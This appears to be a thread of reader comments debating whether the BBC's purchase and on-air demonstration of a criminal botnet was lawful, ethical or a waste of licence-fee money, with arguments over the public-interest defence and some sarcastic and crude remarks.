Stupid, stupid, stupid, stupid. They have managed to undermine security professionals everywhere.
Ever heard of "civil disobedience"? Anyway, how would YOU go about it? You can't use computers you know about because that introduces bias. So would constructing a botnet of your own. Awareness of even the potential of being invaded will influence behaviour and introduce even more bias. So how do you perform a real-world test of a botnet under unbiased real-world circumstances without performing an in-the-wild test?
I hope you don't mind, but your letter echoed my thoughts, so I have copied it and also sent it as a complaint with the addendum that I have copied it from another disgruntled person. I do not want my licence fee paying for criminal activity. How many unscrupulous individuals will now use the BBC logo to hide what they are doing? This was stupidity of the highest degree. I can't even express how angry I am that licence payers' money has been given to a criminal gang for 'journalistic' reasons.
Dear Sir
Once again this covert communist front-organisation has been exposed dispersing public funding to criminals. For how much longer do we have to put up with this? Doesn't the BBC realise that there are starving bankers sleeping in cardboard boxes who are in much more need of support. British criminals deserve our money rather than a bunch of east European Johnnies.
Anyway, what's all this nonsense about botty-nets, eh? In my day they were called nappies or diapers, and none the worse for it. But that's the Beeb for you - full of shit as usual.
Outraged
Tunbridge Wells
"Could a defence of 'in the public interest' be used?..."
Well, the BBC are skilled at breaking the law and using the above defence. Following the actions of someone whom a Scottish police force should have disarmed long before if they'd had the balls for it, on this day in '96 there was a whole raft of legislation banning 'handguns'. In the months following that ban the BBC contrived to illegally possess, by illegal importation and by deception and theft, 'handguns' and other firearms; their defence, 'in the public interest'.
Whilst C&E and the Police 'investigated' no-one went to jail or even ended up in court. The BBC still glorifies violence and by showing just how easy it was to illegally import firearms acted to promote that illegal trade.
Ah, but Bliar's, now Brown's, Brainwashing Collusionists are part of the state's machinery, and prosecuting them wouldn't be in the state's interest...
I have yet to find a door lock that a competent criminal or a locksmith can't pick. Using the same twisted logic of some of the fine people here, we should be suing lock manufacturers. The truth to the matter is, as long as man made it, man can break it.
Forget about the burglars, let's sue lock, door, window, and window glass makers. Their products are obviously not strong enough to deter a determined thief.
Rather than going into a Daily Mail moral outrage mode, did you watch it (it's on iPlayer now also, I think)?
Legality aside, it was a very interesting programme, in part for seeing just how advanced and professional the botnet software is. As Click's audience includes a lot of far less IT-savvy people, I'm hoping this will serve as a wake-up call. It's amazing just how many people don't really understand how spam is sent and still believe spam mails are personally sent to them, and they feel they have a need to read, reply and act on the spam.
It is also nice to see the botnet includes the ability to destroy itself. I'd be all for illegally using a botnet to kill the botnet.
"... Can we please bring the concept of 'Rules are for the guidance of wise men and the obedience of fools.' into law? Pretty please? "
Only if I'm one of the wise and you are one of the fools.
Now do you see the problem with this wonderful concept?
No, I didn't think you would. That rather proves my point.
I find it easy to applaud the BBC's actions; there was obviously no malicious intent. The spirit of the law, that is to decrease malicious abuse of computers, was palpably upheld.
I'm fed up with seeing the easy targets shot at. The real criminals are those that crafted the botnet, and they should be the ones brought to justice, not the BBC.
Maybe the BBC putdowners already own botnets but paid far more than the BBC did?
Or perhaps they wish the Beeb never made it public just how many computers have been compromised, how easy it is to do, how sophisticated the tools are and how buoyant a botnet is with marketable qualities?